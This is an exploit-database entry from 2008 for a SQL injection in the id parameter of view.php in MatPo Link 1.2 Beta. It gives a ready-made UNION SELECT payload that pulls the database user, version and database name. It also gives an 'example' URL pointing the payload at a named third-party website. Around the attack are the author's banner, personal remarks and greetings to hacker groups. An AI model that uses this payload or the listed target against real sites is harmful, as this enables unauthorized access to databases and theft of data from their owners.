MatPo Link 1.2b - SQL Injection

EDB-ID:

6967


Author:

ZoRLu

Type:

webapps


Platform:

PHP

Date:

2008-11-03


[~] MatPo Link Version 1.2 Beta Remote Sql inj.
[~]
[~] view.php (id)
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 03.11.2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] contact: trt-turk@hotmail.com
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~] 
[~] N0T: a.q kpss yuzden nete ara verebilirim : (
[~]
[~] -----------------------------------------------------------

Exploit:

http://localhost/script_path/view.php?id=[SQL]

[SQL]=

-999999999+union+select+1,2,concat(user(),0x3a,version()),database(),5,6,7--

example:

http://hilfe-forum.pytalhost.de/linkliste/view.php?id=-999999999+union+select+1,2,concat(user(),0x3a,version()),database(),5,6,7--

[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & all Muslim HaCkeRs
[~]
[~] yildirimordulari.org  &  darkc0de.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2008-11-03]